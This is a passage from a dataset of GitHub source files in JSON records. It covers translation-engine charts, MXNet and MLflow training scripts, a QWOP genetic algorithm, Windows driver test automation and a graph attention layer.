dataframe搜索目标语言\r\n df2 = df[df['目标语言'] == language_key]\r\n # dataframe搜索翻译引擎 count 计数函数\r\n y_data.append(df2[df2['用户选择的翻译引擎'] == fanyi_key]['翻译结果'].count())\r\n plt.bar(x_width, y_data, width=0.2, align='center', label=fanyi_key)\r\n x_width = [(i + 0.2) for i in x_width]\r\n plt.xticks([0.3, 1.3, 2.3, 3.3], x_data)\r\n plt.legend()\r\n return plt\r\n\r\ndef pos_radar():\r\n fanyi_lists = ['百度', '有道', '谷歌']\r\n with open('nlp_analys/nlp_pos.json','r',encoding='utf-8') as f:\r\n results = json.load(f)\r\n return radar('翻译引擎不同类型词性分析能力', fanyi_lists, results)\r\n\r\ndef ner_radar():\r\n fanyi_lists = ['百度', '有道', '谷歌']\r\n with open('nlp_analys/nlp_ner.json', 'r', encoding='utf-8') as f:\r\n results = json.load(f)\r\n return radar('翻译引擎不同类型实体分析能力', fanyi_lists, results)\r\n\r\n\r\ndef radar(title,fanyi_lists,results):\r\n '''\r\n 构建雷达图\r\n :param title: 雷达图名称\r\n :param fanyi_lists: 翻译引擎\r\n :param results: 翻译引擎结果\r\n :return: 雷达图\r\n '''\r\n plt.style.use('ggplot')\r\n plt.rcParams[\"font.sans-serif\"] = ['SimHei']\r\n plt.rcParams[\"axes.unicode_minus\"] = False\r\n\r\n # pos_tags = {'a': '形容词', 'n': '名词', 'v': '动词', 'm': '量词', 'd': '副词', 'r': '代词'}\r\n # ner_tags = {'Nh': '人名', 'Ni': '机构名', 'Ns': '地名'}\r\n # results = [{\"形容词\": 87, \"名词\": 79, \"动词\": 95, \"量词\": 92,'代词':150,'副词':120}]\r\n\r\n max_length = max([r for result in results for r in result.values()])\r\n data_length = len(results[0])\r\n # 将极坐标根据数据长度进行等分\r\n angles = np.linspace(0, 2 * np.pi, data_length, endpoint=False)\r\n labels = [key for key in results[0].keys()]\r\n score = [[v for v in result.values()] for result in results]\r\n # 使雷达图数据封闭\r\n angles = np.concatenate((angles, [angles[0]]))\r\n labels = np.concatenate((labels, [labels[0]]))\r\n # 设置图形的大小\r\n fig = plt.figure(figsize=(8, 6), dpi=100)\r\n # 新建一个子图\r\n ax = plt.subplot(111, polar=True)\r\n # 绘制雷达图\r\n for s in score:\r\n score_a = np.concatenate((s, [s[0]]))\r\n ax.plot(angles, score_a)\r\n # 设置雷达图中每一项的标签显示\r\n ax.set_thetagrids(angles * 180 / np.pi, labels)\r\n # 设置雷达图的0度起始位置\r\n ax.set_theta_zero_location('N')\r\n # 设置雷达图的坐标刻度范围\r\n ax.set_rlim(0, max_length)\r\n # 设置雷达图的坐标值显示角度,相对于起始角度的偏移量\r\n ax.set_rlabel_position(270)\r\n ax.set_title(title)\r\n plt.legend(fanyi_lists, loc='best')\r\n return plt\r\n\r\n\r\nif __name__ == '__main__':\r\n contexts = centext_ltp([\"小明去深圳宝安区参加了一场腾讯会议\",\"阿里巴巴公司正在进行裁员\"])\r\n print(contexts.sent_split())\r\n print(contexts.seg()[0])\r\n print(contexts.pos())\r\n print(contexts.ner())\r\n print(len(contexts))\r\n pos_radar()\r\n ner_radar()\r\n\r\n\r\n","repo_name":"cshmzin/fanyi","sub_path":"data_analys.py","file_name":"data_analys.py","file_ext":"py","file_size_in_byte":4657,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"720221575","text":"import mxnet as mx\nimport os\nimport logging\nimport argparse\nfrom math import ceil\nimport sparse_sgd\n\n# symbol net\ndef get_symbol():\n data = mx.symbol.Variable('data')\n fc1 = mx.symbol.FullyConnected(data, name='fc1', num_hidden=128)\n act1 = mx.symbol.Activation(fc1, name='relu1', act_type=\"relu\")\n fc2 = mx.symbol.FullyConnected(act1, name='fc2', num_hidden=64)\n act2 = mx.symbol.Activation(fc2, name='relu2', act_type=\"relu\")\n fc3 = mx.symbol.FullyConnected(act2, name='fc3', num_hidden=10)\n softmax = mx.symbol.SoftmaxOutput(fc3, name='sm')\n\n return softmax\n\n# download ubyte version of mnist and untar\ndef download_data():\n if not os.path.isdir(\"data/\"):\n os.system(\"mkdir data/\")\n if (not os.path.exists('data/train-images-idx3-ubyte')) or \\\n (not os.path.exists('data/train-labels-idx1-ubyte')) or \\\n (not os.path.exists('data/t10k-images-idx3-ubyte')) or \\\n (not os.path.exists('data/t10k-labels-idx1-ubyte')):\n os.system(\"wget -q http://data.mxnet.io/mxnet/data/mnist.zip -P data/\")\n os.chdir(\"./data\")\n os.system(\"unzip -u mnist.zip\")\n os.chdir(\"..\")\n\n# get data iterators\ndef get_iters(batch_size):\n train = mx.io.MNISTIter(\n image=\"data/train-images-idx3-ubyte\",\n label=\"data/train-labels-idx1-ubyte\",\n data_shape=(784,),\n label_name='sm_label',\n batch_size=batch_size,\n shuffle=True,\n flat=True,\n silent=False,\n seed=10)\n val = mx.io.MNISTIter(\n image=\"data/t10k-images-idx3-ubyte\",\n label=\"data/t10k-labels-idx1-ubyte\",\n data_shape=(784,),\n label_name='sm_label',\n batch_size=batch_size,\n shuffle=True,\n flat=True,\n silent=False)\n\n return (train, val)\n\ndef test_mlp(args):\n # get parameters\n prefix = './mlp'\n batch_size = 100\n pruning_switch_epoch = [int(i) for i in args.pruning_switch_epoch.split(',')]\n num_epoch = pruning_switch_epoch[-1]\n batches_per_epoch = ceil(60000.0/batch_size)\n weight_sparsity = args.weight_sparsity\n bias_sparsity = args.bias_sparsity\n weight_threshold = args.weight_threshold\n bias_threshold = args.bias_threshold\n if args.weight_sparsity:\n weight_sparsity = [float(i) for i in args.weight_sparsity.split(',')]\n bias_sparsity = [float(i) for i in args.bias_sparsity.split(',')]\n else:\n weight_threshold = [float(i) for i in args.weight_threshold.split(',')]\n bias_threshold = [float(i) for i in args.bias_threshold.split(',')]\n\n # get symbols and iterators\n sym = get_symbol()\n download_data()\n (train, val) = get_iters(batch_size)\n\n # fit model\n model = mx.mod.Module(\n sym,\n context=[mx.cpu(i) for i in range(2)],\n data_names=['data'],\n label_names=['sm_label'])\n optimizer_params = {\n 'learning_rate' : 0.1,\n 'wd' : 0.004,\n 'momentum' : 0.9,\n 'pruning_switch_epoch' : pruning_switch_epoch,\n 'batches_per_epoch' : batches_per_epoch,\n 'weight_sparsity' : weight_sparsity,\n 'bias_sparsity' : bias_sparsity,\n 'weight_threshold' : weight_threshold,\n 'bias_threshold' : bias_threshold}\n logging.info('Start training...')\n model.fit(train,\n eval_data=val,\n eval_metric='acc',\n epoch_end_callback=mx.callback.do_checkpoint(prefix),\n num_epoch=num_epoch,\n optimizer='sparsesgd',\n optimizer_params=optimizer_params)\n logging.info('Finish traning...')\n\n # remove files\n for i in range(num_epoch):\n os.remove('%s-%04d.params' % (prefix, i + 1))\n os.remove('%s-symbol.json' % prefix)\n\n\nif __name__ == \"__main__\":\n\n # print logging by default\n logging.basicConfig(level=logging.DEBUG)\n\n parser = argparse.ArgumentParser(description=\"sparse training\")\n parser.add_argument('--pruning_switch_epoch', type=str)\n parser.add_argument('--weight_sparsity', type=str, default=None)\n parser.add_argument('--bias_sparsity', type=str, default=None)\n parser.add_argument('--weight_threshold', type=str, default=None)\n parser.add_argument('--bias_threshold', type=str, default=None)\n args = parser.parse_args()\n\n test_mlp(args)\n","repo_name":"hpi-xnor/BMXNet","sub_path":"example/dsd/mlp.py","file_name":"mlp.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"en","doc_type":"code","stars":347,"dataset":"github-code","pt":"37"} +{"seq_id":"1749453078","text":"import argparse\nfrom pathlib import Path\nimport pickle\n\nimport mlflow\nimport numpy as np\n\nfrom hyperopt import STATUS_OK, Trials, fmin, hp, tpe\nfrom hyperopt.pyll import scope\n\nfrom sklearn.ensemble import RandomForestRegressor\nfrom sklearn.metrics import mean_squared_error\n \ndef load_pickle(filename: str):\n with open(filename, \"rb\") as f_in:\n return pickle.load(f_in)\n\n\ndef run(data_path, tracking_uri, num_trials):\n\n dv = load_pickle(data_path / 'dv.pkl')\n X_train, y_train = load_pickle(data_path / 'train.pkl')\n X_valid, y_valid = load_pickle(data_path / 'valid.pkl')\n\n if tracking_uri:\n mlflow.set_tracking_uri(tracking_uri)\n else:\n mlflow.set_tracking_uri(\"sqlite:///mlflow.db\")\n\n mlflow.set_experiment(\"nyc-taxi-experiment\")\n \n # mlflow.sklearn.autolog()\n def objective(params):\n with mlflow.start_run():\n mlflow.set_tags(\n {'estimator_name':'RandomForestRegressor',\n 'estimator_class':'sklearn.ensemble._forest.RandomForestRegressor'}\n )\n mlflow.log_params(params)\n\n rf = RandomForestRegressor(**params)\n rf.fit(X_train, y_train)\n\n mlflow.sklearn.log_model(rf, artifact_path='model')\n y_pred = rf.predict(X_valid)\n rmse = mean_squared_error(y_valid, y_pred, squared=False)\n mlflow.log_metric('rmse', rmse)\n\n with open(data_path / 'dict_vectorizer.bin', 'wb') as f_out:\n pickle.dump(dv, f_out)\n \n # accepts str path only\n mlflow.log_artifact(str(data_path / 'dict_vectorizer.bin'))\n\n return {'loss': rmse, 'status': STATUS_OK}\n\n search_space = {\n 'max_depth': scope.int(hp.quniform('max_depth', 1, 20, 1)),\n 'n_estimators': scope.int(hp.quniform('n_estimators', 10, 50, 1)),\n 'min_samples_split': scope.int(hp.quniform('min_samples_split', 2, 10, 1)),\n 'min_samples_leaf': scope.int(hp.quniform('min_samples_leaf', 1, 4, 1)),\n 'random_state': 42\n }\n\n rstate = np.random.default_rng(42) # for reproducible results\n\n fmin(\n fn=objective,\n space=search_space,\n algo=tpe.suggest,\n max_evals=num_trials,\n trials=Trials(),\n rstate=rstate\n )\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--data_path\",\n default=\"../data/output\",\n type=Path,\n help=\"the location where the processed NYC taxi trip data was saved.\"\n )\n parser.add_argument(\n \"--tracking_uri\", \"-t\",\n default=None,\n help=\"Host:port if remote; leave none for local mlflow.db file\"\n )\n parser.add_argument(\n \"--max_evals\",\n default=50,\n type=int,\n help=\"the number of parameter evaluations for the optimizer to explore.\"\n )\n args = parser.parse_args()\n\n run(\n args.data_path, \n args.tracking_uri, \n args.max_evals\n )\n","repo_name":"vykuang/mlops-zoomcamp","sub_path":"w4-deployment/web-service-mlflow/train_hpo.py","file_name":"train_hpo.py","file_ext":"py","file_size_in_byte":3002,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6800694731","text":"m = int(input())\r\nd = int(input())\r\ns = (m*2+d)%3 \r\nif s ==0 :\r\n print('普通')\r\nelif s ==1:\r\n print('吉')\r\nelse :\r\n print('大吉')\r\n \r\n#exec(n = [ eval(i) for i in input().split()]),print([\"普通\",\"吉\",\"大吉\"][(n[0]*2+n[1])%3])\r\n\r\n","repo_name":"Bill640616Chen/python","sub_path":"w3-Excersize003-1.py","file_name":"w3-Excersize003-1.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"19864284303","text":"import random\n\ndef createNewPopulation(oldPopulation):\n #breed the fittest parents until we have a full population again and run\n newPopulation = []\n fittestIndexes = getFittest(oldPopulation)\n\n #log data about parents to be bred to file\n parents = []\n for x in range(len(fittestIndexes)):\n parents.append(oldPopulation[fittestIndexes[x]])\n\n with open(\"population.txt\", \"a\") as myFile:\n myFile.write(str(parents)+\"\\n\")\n\n for x in range(0, 4):\n for y in range(x+1, 4):\n parent1 = fittestIndexes[x]\n parent2 = fittestIndexes[y]\n children = breedParents(parent1, parent2, oldPopulation)\n for child in children:\n newPopulation.append(child)\n\n for i in range(len(newPopulation)):\n newPopulation[i] = mutateChild(newPopulation[i])\n\n with open(\"population.txt\", \"a\") as myFile:\n myFile.write(str(newPopulation)+\"\\n\")\n\n return list(newPopulation)\n\ndef getMin(myList):\n mini = myList[0][0]\n miniIndex = 0\n for x in range(1, len(myList)):\n if myList[x][0] < mini:\n mini = myList[x][0]\n miniIndex = x\n\n return mini, miniIndex\n\ndef getFittest(population):\n fittest = []\n #fill a list of 4 fittest until end of population\n for x in range(len(population)):\n fitness = getFitnessOfSpecies(population[x])\n if len(fittest) < 4:\n fittest.append([fitness, x])\n else:\n score, index = getMin(fittest)\n if score < fitness:\n #remove the min and put new fitness in\n del fittest[index]\n fittest.append([fitness, x])\n\n #return index of 4 fittest parents\n returnList = []\n for x in range(len(fittest)):\n returnList.append(fittest[x][1])\n\n return returnList\n\ndef breedParents(parent1Index, parent2Index, population):\n #breed 6 children\n children = []\n\n #pick a random sub-section 1/5th the size of both parents and switch them to create a child\n shortestParent = min(len(population[parent1Index][0]), len(population[parent2Index][0]))\n substringLength = shortestParent//5\n\n for _ in range(3):\n startSplit = random.randrange(0, shortestParent-substringLength)\n newChildString1 = population[parent2Index][0][:startSplit] + population[parent1Index][0][startSplit:startSplit+substringLength] + population[parent2Index][0][startSplit+substringLength:] \n newChildString2 = population[parent1Index][0][:startSplit] + population[parent2Index][0][startSplit:startSplit+substringLength] + population[parent1Index][0][startSplit+substringLength:]\n children.append(newChildString1) \n children.append(newChildString2)\n\n return children\n\ndef mutateChild(child):\n #pick random inputs and change them\n temp = list(child)\n\n for _ in range(random.randrange(0, len(child)//6)):\n place = random.randrange(len(child))\n temp[place] = str(random.randrange(0, 16))\n\n return \"\".join(temp)\n\ndef getFitnessOfSpecies(species):\n fitness = float(species[1])/float(species[2])\n return fitness","repo_name":"etopiei/QWOP-Bot","sub_path":"gen.py","file_name":"gen.py","file_ext":"py","file_size_in_byte":3116,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"9135571686","text":"from pili import *\n\naccess_key=\"\"\nsecret_key=\"\"\n\nhub_name=\"jinxinxin\"\nrtmp_publish_host=\"pili-publish.live.golanghome.com\"\nhls_live_play_host=\"pili-live-hls.live.golanghome.com\"\n\n#publish address\n#rtmp://pili-publish.live.golanghome.com/jinxinxin/test?key=abc\n\ncredentials=Credentials(access_key,secret_key)\nhub=Hub(credentials,hub_name)\n\nstream=hub.create_stream(publishSecurity=\"dynamic\")\nprint(stream.id)\nprint(stream.to_json())\n\nrtmp_url=stream.rtmp_publish_url()\nprint(rtmp_url)\n\n\nhls_urls=stream.hls_live_urls()\nprint(hls_urls)\n\n","repo_name":"lubaoyilang/qiniu-live-server","sub_path":"example/create_stream.py","file_name":"create_stream.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"6617729066","text":"import json\r\nimport pickle\r\nfrom keypoints.facial_landmarks import initialisation\r\nfrom keypoints.detectvisage import detectvisage\r\nimport sys\r\n\r\ncheminPhoto = sys.argv[1]\r\nprint(cheminPhoto)\r\n# On lance la fonction d'initialisation pour l'analyse d'image\r\ndetector, predictor = initialisation()\r\n\r\n# On sauvegarde le detector\r\ndetectorFile = open(\"./stockage/detector.txt\", \"wb\")\r\ndetectorFile.write(pickle.dumps(detector))\r\ndetectorFile.close()\r\n\r\n# On sauvegarde de predictor\r\npredictorFile = open(\"./stockage/predictor.txt\", \"wb\")\r\npredictorFile.write(pickle.dumps(predictor))\r\npredictorFile.close()\r\n\r\n# On récupère les coordonnees de la bonne posture\r\nx11,y11,x19,y19,x17,y17,D = detectvisage(cheminPhoto, detector, predictor)\r\n\r\n# On sauvegarde les coordonnées de la bonne posture\r\nfichier = open(\"./stockage/coordonnees.json\", \"w\")\r\nfichier.write(json.dumps([x11,y11,x19,y19,x17,y17,D]))\r\nfichier.close()\r\n","repo_name":"EstebanEstoc/Capgemini-Assistant-for-Working-Position","sub_path":"initialize.py","file_name":"initialize.py","file_ext":"py","file_size_in_byte":917,"program_lang":"python","lang":"fr","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"1289947441","text":"from _winreg import *\r\nfrom ntsecuritycon import *\r\nfrom sys import stdout\r\nfrom test_file import *\r\nimport win32security\r\nimport win32api\r\nimport psutil\r\nimport subprocess\r\nimport time\r\n\r\n\r\nglobal keyObject\r\nkeyObject = None\r\n\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #\r\n# Opens registry key with specified subkey #\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #\r\ndef RegistryKey(rkey, skey):\r\n spath = skey\r\n kres = True\r\n global keyObject\r\n if rkey == 'HKEY_USERS':\r\n try:\r\n keyObject = OpenKey(HKEY_USERS, spath)\r\n except WindowsError:\r\n kres = False\r\n else:\r\n try:\r\n keyObject = OpenKey(HKEY_LOCAL_MACHINE, spath)\r\n except WindowsError:\r\n kres = False\r\n return kres\r\n\r\n\r\n\r\n# Checks value info for subkey\r\n# Returns dict of missing values\r\n\r\ndef RegistryValue(json_report):\r\n test_name = \"Registry Check\"\r\n result = True\r\n path = r'C:\\Wacomation\\resources\\RegList.json'\r\n with open(path, 'r') as f:\r\n val_dict = json.load(f)\r\n f.close()\r\n typeList = ['NONE', 'REG_SZ', 'REG_EXPAND_SZ', 'REG_BINARY', 'REG_DWORD',\r\n 'REG_DWORD_BIG_ENDIAN', 'REG_LINK', 'REG_MULTI_SZ',\r\n 'REG_RESOURCE_LIST', 'REG_FULL_RESOURCE_DESCRIPTOR',\r\n 'REG_RESOURCE_REQUIREMENTS_LIST', 'REG_QWORD']\r\n # The numerical list position of each of the above RegTypes corresponds with the matching \"q_type\" integer value\r\n # returned by the _winreg.EnumValue method. These should not change, so maybe convert to tuple\r\n\r\n error_map = {}\r\n kcount = 1\r\n vkeylist = list(val_dict.keys())\r\n vkeylist.sort()\r\n for val in vkeylist:\r\n valCompareResult = False\r\n vname = val_dict[val]['Name']\r\n vtype = val_dict[val]['Type']\r\n vdata = val_dict[val]['Data']\r\n _name = vname.strip()\r\n _type = vtype\r\n _data = vdata\r\n sk, v, lm = QueryInfoKey(keyObject)\r\n i = 0\r\n errcout = 0\r\n while i < v:\r\n while not valCompareResult:\r\n q_name, q_data, q_type = EnumValue(keyObject, i)\r\n _compare = cmp(str(q_data), str(_data.strip('\"')))\r\n q_type = typeList[q_type]\r\n if _name == '(Default)':\r\n _name = ''\r\n if (_name, _compare, _type) == (q_name, 0, q_type):\r\n valCompareResult = True\r\n i += 1\r\n errcout += 1\r\n result = False\r\n cout = str(errcout)\r\n error_map[cout]['Name'] = vname\r\n error_map[cout]['Type'] = vtype\r\n error_map[cout]['Data'] = vdata\r\n results_map = AddTest(json_report, test_name, result, error_map)\r\n return results_map\r\n\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #\r\n# Method that assigns the next script to run on startup #\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #\r\ndef RegEntry(d, s):\r\n RegPath = r\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\"\r\n RunOnce = OpenKey(HKEY_CURRENT_USER, RegPath, 0, KEY_WRITE)\r\n SetValueEx(RunOnce, \"Test Automation\", 0, REG_SZ, r\"C:\\%s\\scripts\\%s\" % (d, s))\r\n CloseKey(RunOnce)\r\n\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\n# Function that adjusts privileges so the script can perform a reboot #\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\ndef AdjustPrivilege(priv, enable=1):\r\n # Get process token\r\n flags = TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY\r\n htoken = win32security.OpenProcessToken(win32api.GetCurrentProcess(), flags)\r\n # Get the ID for the system shutdown privilege\r\n id = win32security.LookupPrivilegeValue(None, priv) # params = (systemName, privilegeName)\r\n # Obtain the privilege for this process\r\n # Create a list of privileges to be added\r\n if enable:\r\n newPrivileges = [(id, SE_PRIVILEGE_ENABLED)]\r\n else:\r\n newPrivileges = [(id, 0)]\r\n # make the privilege adjustment\r\n win32security.AdjustTokenPrivileges(htoken, 0, newPrivileges)\r\n\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\n# Function that adjusts privileges and performs reboot when called #\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\ndef RebootSystem(message=\"Rebooting\", timeout=0, bForce=1, bReboot=1):\r\n AdjustPrivilege(SE_SHUTDOWN_NAME)\r\n try:\r\n win32api.InitiateSystemShutdown(None, message, timeout, bForce, bReboot)\r\n finally:\r\n # Remove privilege just added\r\n AdjustPrivilege(SE_SHUTDOWN_NAME, 0)\r\n\r\n\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\n# Function that iterates through process list to find process \"pname,\" #\r\n# then returns true, PID, and status when found #\r\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~#\r\ndef FindProcess(pname):\r\n n = False\r\n pid = 0\r\n pstat = 'not found'\r\n for process in psutil.process_iter():\r\n process = psutil.Process(process.pid)\r\n proc_name = process.name()\r\n if proc_name == pname:\r\n pid = process.pid\r\n pstat = process.status()\r\n n = True\r\n return n, pid, pstat\r\n\r\n\r\ndef ProcessTest(json_report):\r\n error = {}\r\n i = 0\r\n result = True\r\n test_name = \"Process Check\"\r\n proc_list = ['Wacom_Tablet.exe', 'Wacom_TabletUser.exe',\r\n 'Wacom_TouchUser.exe', 'WTabletServicePro.exe', 'WacomHost.exe']\r\n for name in proc_list:\r\n res, pid, pstatus = FindProcess(name)\r\n if not res:\r\n result = False\r\n i += 1\r\n error[i] = name + \" \" + pstatus\r\n results_map = AddTest(json_report, test_name, result, error)\r\n return results_map\r\n\r\n\r\ndef FileTest(json_report):\r\n error_map = dict()\r\n missing_count = 0\r\n test_name = \"File Check\"\r\n result = True\r\n with open(r'C:\\Wacomation\\resources\\FileList.json', 'r') as f:\r\n file_map = json.load(f)\r\n pkeylist = list(file_map.keys())\r\n pkeylist.sort()\r\n for p in pkeylist:\r\n _path = file_map[p]['Path']\r\n pcheck = os.path.exists(_path)\r\n if not pcheck:\r\n missing_count += 1\r\n result = False\r\n error_map.update([(missing_count, _path)])\r\n else:\r\n fkeylist = list(file_map[p]['ContainsFiles'].keys())\r\n fkeylist.sort()\r\n for f in fkeylist:\r\n _file = file_map[p]['ContainsFiles'][f]['FileName']\r\n f_path = _path + '\\\\' + _file\r\n fcheck = os.path.exists(f_path)\r\n # _size = file_map[p]['ContainsFiles'][f]['ByteSize']\r\n if not fcheck:\r\n missing_count += 1\r\n error_map.update([(missing_count, f_path)])\r\n results_map = AddTest(json_report, test_name, result, error_map)\r\n return results_map\r\n\r\ndef InstallDriver():\r\n driver = getMetaValue('driverName')\r\n start = time.time()\r\n process = subprocess.Popen([driver, \"/s\"])\r\n while process.poll() is None: # Function to show elapsed install C:\\Users\\Cash\\Desktop\\setuptools-19.6.1time\r\n elapsed = time.time() - start\r\n stdout.write(\"\\rFinsting. Elapsed time: %d\" % elapsed)\r\n stdout.flush()\r\n _result = True\r\n _error = None\r\n if process.returncode != 0: # If call return is 0 (no errors) makes new reg entry\r\n _result = False\r\n _error = process.returncode\r\n return _result, _error\r\n\r\n\r\ndef UninstallDriver():\r\n start = time.time()\r\n path = r\"C:\\Program Files\\Tablet\\Wacom\\32\\Remove.exe\"\r\n process = subprocess.Popen([path, \"/u\", \"/s\"], shell=True, cwd=r\"C:\\Program Files\\Tablet\\Wacom\\32\")\r\n while process.poll() is None:\r\n elapsed = time.time() - start\r\n stdout.write(\"\\rUinsting. Elapsed time: %d seconds\" % elapsed)\r\n stdout.flush()\r\n\r\n _result = True\r\n if process.returncode != 0: # If call return is 0 (no errors) makes new reg entry for next script then restarts\r\n _result = False\r\n rc = process.returncode\r\n else:\r\n rc = process.returncode\r\n return rc, _result\r\n\r\n\r\n\r\n\r\n\r\n# Experimenting with automated login\r\n# user = getpass.getuser()\r\n# print(\"The user name is %s\" % user)\r\n# user_name = os.getlogin()\r\n# print(\"The user_name is %s\" % user_name)\r\n# user2 = os.environ.get(\"USERNAME\")\r\n# print(user2)\r\n","repo_name":"snizzard/Wacomation","sub_path":"wac_functions.py","file_name":"wac_functions.py","file_ext":"py","file_size_in_byte":8545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72594970027","text":"import torch\nimport torch.nn as nn\nimport dgl\nimport torch.nn.functional as F\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\nfrom dgl import function as fn\nfrom dgl.ops import edge_softmax\nfrom dgl.utils import expand_as_pair\n\n\nclass HeteroGraphConv(nn.Module):\n def __init__(self, mods: dict):\n \"\"\"\n\n :param mods: input modules for graph learning\n :param relation_aggregate: aggregate manner node features generated by different relations\n \"\"\"\n super(HeteroGraphConv, self).__init__()\n self.mods = nn.ModuleDict(mods)\n\n def forward(self, graph: dgl.DGLHeteroGraph, input_src: dict, input_dst: dict, src_node_transformation: nn.ModuleDict,\n dst_node_transformation: nn.ModuleDict, src_node_attention: nn.ParameterDict, dst_node_attention: nn.ParameterDict):\n \"\"\"\n call the forward function with each module.\n\n Parameters\n ----------\n graph : DGLHeteroGraph\n The Heterogeneous Graph.\n input_src : dict[str, Tensor], Input source node features {'ntype': features}.\n input_dst : dict[str, Tensor], Input destination node features {'ntype': features}.\n src_node_transformation: nn.ModuleDict, weights {'ntype', (input_dim, hidden_dim * heads)}\n dst_node_transformation: nn.ModuleDict, weights {'ntype', (input_dim, hidden_dim * heads)}\n src_node_attention: nn.ParameterDict, weights {'ntype', (1, num_heads, out_size)}\n dst_node_attention: nn.ParameterDict, weights {'ntype', (1, num_heads, out_size)}\n\n Returns\n -------\n outputs, dict[str, Tensor]\n Output representations for each type of destination node -> {dtype: features}.\n \"\"\"\n\n # key: dsttype, value: list of representations\n outputs = defaultdict(list)\n\n for stype, etype, dtype in graph.canonical_etypes:\n rel_graph = graph[stype, etype, dtype]\n if rel_graph.number_of_edges() == 0:\n continue\n\n # shape (dst_nodes, hid_dim)\n outputs[dtype].append(self.mods[etype](rel_graph, (input_src[stype], input_dst[dtype]), src_node_transformation[stype], dst_node_transformation[dtype],\n src_node_attention[stype], dst_node_attention[dtype]).flatten(start_dim=1))\n\n output_features = {}\n for ntype in outputs:\n if len(outputs[ntype]) == 1:\n output_features[ntype] = outputs[ntype][0]\n else:\n output_features[ntype] = torch.mean(torch.stack(outputs[ntype], dim=0), dim=0)\n\n return output_features\n\n\nclass GATConv(nn.Module):\n def __init__(self, in_feats: int, out_feats: int, num_heads: int, feat_drop: float = 0.0, use_attn_dst: bool = True, use_symmetric_norm: bool = False):\n \"\"\"\n\n :param in_feats:\n :param out_feats:\n :param num_heads:\n :param feat_drop:\n :param use_attn_dst: whether calculate attention for destination node\n :param use_symmetric_norm: whether use use symmetric norm\n \"\"\"\n super(GATConv, self).__init__()\n self._num_heads = num_heads\n self._in_src_feats, self._in_dst_feats = expand_as_pair(in_feats)\n self._out_feats = out_feats\n\n self.feat_dropout = nn.Dropout(feat_drop)\n self.leaky_relu = nn.LeakyReLU(negative_slope=0.2)\n\n self.use_attn_dst = use_attn_dst\n self._use_symmetric_norm = use_symmetric_norm\n\n def forward(self, graph: dgl.DGLHeteroGraph, feat: torch.Tensor or tuple, src_node_transformation: nn.Module, dst_node_transformation: nn.Module,\n src_node_attention: nn.Parameter, dst_node_attention: nn.Parameter):\n \"\"\"\n graph : The graph\n feat : torch.Tensor or pair of torch.Tensor\n src_node_transformation : nn.Parameter, trainable parameters for source node feature transformation\n dst_node_transformation : nn.Parameter, trainable parameters for destination node feature transformation\n src_node_attention : nn.Parameter, trainable attention vector for source node\n dst_node_attention : nn.Parameter, trainable attention vector for destination node\n \"\"\"\n\n with graph.local_scope():\n if isinstance(feat, tuple):\n h_src = self.feat_dropout(feat[0])\n h_dst = self.feat_dropout(feat[1])\n feat_src = src_node_transformation(h_src).view(-1, self._num_heads, self._out_feats)\n feat_dst = dst_node_transformation(h_dst).view(-1, self._num_heads, self._out_feats)\n else:\n h_src = h_dst = self.feat_dropout(feat)\n feat_src = feat_dst = src_node_transformation(h_src).view(-1, self._num_heads, self._out_feats)\n if graph.is_block:\n feat_dst = feat_src[:graph.number_of_dst_nodes()]\n\n if self._use_symmetric_norm:\n degs = graph.out_degrees().float().clamp(min=1)\n norm = torch.pow(degs, -0.5)\n shp = norm.shape + (1,) * (feat_src.dim() - 1)\n norm = torch.reshape(norm, shp)\n feat_src = feat_src * norm\n\n el = (feat_src * src_node_attention).sum(dim=-1).unsqueeze(-1)\n graph.srcdata.update({'ft': feat_src, 'el': el})\n\n if self.use_attn_dst:\n er = (feat_dst * dst_node_attention).sum(dim=-1).unsqueeze(-1)\n graph.dstdata.update({'er': er})\n # compute edge attention, el and er are a_l Wh_i and a_r Wh_j\n graph.apply_edges(fn.u_add_v('el', 'er', 'e'))\n else:\n graph.apply_edges(fn.copy_u(\"el\", \"e\"))\n\n e = self.leaky_relu(graph.edata.pop('e'))\n graph.edata[\"a\"] = edge_softmax(graph, e)\n\n # message passing\n graph.update_all(fn.u_mul_e('ft', 'a', 'm'), fn.sum('m', 'ft'))\n rst = graph.dstdata['ft']\n\n if self._use_symmetric_norm:\n degs = 